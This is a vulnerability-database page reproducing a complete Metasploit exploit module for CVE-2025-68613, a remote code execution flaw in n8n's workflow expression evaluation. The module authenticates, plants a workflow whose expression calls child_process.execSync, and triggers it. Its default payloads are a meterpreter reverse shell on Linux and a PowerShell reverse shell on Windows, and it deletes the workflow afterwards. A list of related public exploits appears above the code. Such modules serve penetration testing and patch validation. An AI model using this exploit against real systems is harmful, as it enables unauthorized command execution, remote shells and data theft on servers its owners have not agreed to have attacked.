Vulners
Lucene search
📄 n8n Workflow Expression Remote Code Execution
🗓️ 14 Jan 2026 00:00:00Reported by Lukas Johannes MöllerType 
packetstorm🔗 packetstorm.news👁 188 Views
| Reporter | Title | Published | Views | Family All 74 |
|---|---|---|---|---|
 | Exploit for CVE-2025-68613 | 25 Dec 202520:01 | – | githubexploit |
| Exploit for CVE-2025-68613 | 26 Dec 202519:40 | – | githubexploit |
| Exploit for Improper Input Validation in N8N | 20 Jan 202611:50 | – | githubexploit |
| Exploit for CVE-2025-68613 | 24 Dec 202513:07 | – | githubexploit |
| Exploit for CVE-2025-68613 | 26 Dec 202515:40 | – | githubexploit |
| Exploit for CVE-2025-68613 | 22 Dec 202506:45 | – | githubexploit |
| Exploit for Improper Control of Dynamically-Managed Code Resources in N8N | 22 Dec 202518:41 | – | githubexploit |
| Exploit for Improper Input Validation in N8N | 30 Jan 202622:38 | – | githubexploit |
| Exploit for Improper Input Validation in N8N | 9 Apr 202611:09 | – | githubexploit |
| Exploit for CVE-2025-68613 | 24 Dec 202517:38 | – | githubexploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'n8n Workflow Expression Remote Code Execution',
'Description' => %q{
This module exploits a critical remote code execution vulnerability (CVE-2025-68613)
in the n8n workflow automation platform. The vulnerability exists in the workflow
expression evaluation system where user-supplied expressions enclosed in {{ }}
are evaluated in an execution context that is not sufficiently isolated from the
underlying Node.js runtime.
An authenticated attacker can create a workflow containing malicious expressions
that access the Node.js process object via this.process.mainModule.require (or via
the constructor) to load child_process and execute arbitrary system commands.
This module uses a Schedule Trigger node to automatically fire and evaluate the
malicious payload. This requires valid credentials to create workflows.
Successful exploitation may lead to full compromise of the n8n instance,
including unauthorized access to sensitive data, modification of workflows,
and execution of system-level operations.
Affected versions: >= 0.211.0 and < 1.120.4, < 1.121.1, < 1.122.0
},
'Author' => [
'Lukas Johannes Möller'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-68613'],
['URL', 'https://github.com/n8n-io/n8n/security/advisories'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-68613']
],
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix/Linux Command',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
# cmd/unix payloads use commands that might not be present in docker instance
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_COMMAND' => 'wget'
}
}
],
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
]
],
'Payload' => {
'BadChars' => %(')
},
'Privileged' => false,
'DisclosureDate' => '2025-06-10',
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 5678,
'SSL' => false
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path to n8n', '/']),
OptString.new('USERNAME', [true, 'n8n username or email for authentication']),
OptString.new('PASSWORD', [true, 'n8n password for authentication'])
]
)
end
def check
return CheckCode::Unknown('Could not authenticate to n8n') unless authenticate
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest', 'settings')
)
return CheckCode::Unknown('Could not connect to n8n') if res.blank?
return CheckCode::Detected('Connected to n8n, received unexpected response') unless res.code == 200
json = res.get_json_document
version = Rex::Version.new(json.dig('data', 'versionCli'))
return CheckCode::Detected('n8n detected but could not determine version') unless version
print_status("Detected n8n version: #{version}")
return CheckCode::Appears("Version #{version} is vulnerable") if version.between?(Rex::Version.new('0.211.0'), Rex::Version.new('1.120.4')) || version == Rex::Version.new('1.121.0')
CheckCode::Safe("Version #{version} is not vulnerable")
end
def authenticate
print_status('Attempting to authenticate...')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => {
'emailOrLdapLoginId' => datastore['USERNAME'],
'email' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_json
)
return true if res&.code == 200
json_data = res.get_json_document
print_error("Login failed: #{json_data['message']}")
false
end
def create_malicious_workflow(cmd)
expression_payload = %<{{ (function(){ return this.process.mainModule.require('child_process').execSync('#{cmd}').toString() })() }}>
@workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
workflow_data = {
'name' => @workflow_name,
'active' => false,
'settings' => {
'saveDataErrorExecution' => 'all',
'saveDataSuccessExecution' => 'all',
'saveManualExecutions' => true,
'executionOrder' => 'v1'
},
'nodes' => [
{
parameters: {},
type: 'n8n-nodes-base.manualTrigger',
typeVersion: 1,
position: [
0,
0
],
'id' => Rex::Text.rand_text_alphanumeric(36),
name: "When clicking 'Execute workflow'"
},
{
parameters: {
values: {
string: [
{
value: "=#{expression_payload}"
}
]
},
options: {}
},
id: '40031677-e085-4434-9168-fb0b21ead60d',
name: 'Set',
type: 'n8n-nodes-base.set',
typeVersion: 1,
position: [
220,
0
]
}
],
'connections' => {
"When clicking 'Execute workflow'" => {
'main' => [
[
{
'node' => 'Set',
'type' => 'main',
'index' => 0
}
]
]
}
}
}
print_status('Creating malicious workflow...')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => workflow_data.to_json
)
fail_with(Failure::UnexpectedReply, "Failed to create workflow: #{res&.code}") unless res&.code == 200 || res&.code == 201
json = res.get_json_document
@workflow_id = json.dig('data', 'id') || json['id']
nodes = json.dig('data', 'nodes')
version_id = json.dig('data', 'versionId')
id = json.dig('data', 'id')
fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response') unless @workflow_id && nodes && version_id && id
activation_data = {
'workflowData' => {
'name' => @workflow_name,
'nodes' => nodes,
'pinData' => {},
'connections' => {
"When clicking 'Execute workflow'" => {
'main' => [
[
{
'node' => 'Set',
'type' => 'main',
'index' => 0
}
]
]
}
},
'active' => false,
'settings' => {
'saveDataErrorExecution' => 'all',
'saveDataSuccessExecution' => 'all',
'saveManualExecutions' => true,
'executionOrder' => 'v1'
},
'tags' => [],
'versionId' => version_id,
'meta' => 'null',
'id' => id
},
'startNodes' => [],
'destinationNode' => 'Set'
}
print_status('Triggering malicious workflow...')
# older versions on n8n allow to execute workflow without workflow ID, while the newer versions
# have URI rest/workflow/[workflow ID]/run available to make workflow run. If the first request
# returns 404, it means that it is probably newer version, so module will try the second variant.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', 'run'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => activation_data.to_json
)
if res&.code == 404
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => activation_data.to_json
)
end
fail_with(Failure::PayloadFailed, 'Could not start workflow') unless res&.code == 200
print_good("Created workflow with ID: #{@workflow_id}")
end
def archive_workflow
print_status("Cleaning up workflow #{@workflow_id}...")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'archive'),
'keep_cookies' => true
)
end
def exploit
cookie_jar.clear
fail_with(Failure::NoAccess, 'Could not authenticate') unless authenticate
create_malicious_workflow(payload.encoded)
end
def cleanup
super
if @workflow_id
archive_workflow
# delete workflow
send_request_cgi(
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s)
)
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2026 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.18.8 - 9.9
EPSS0.65759
SSVC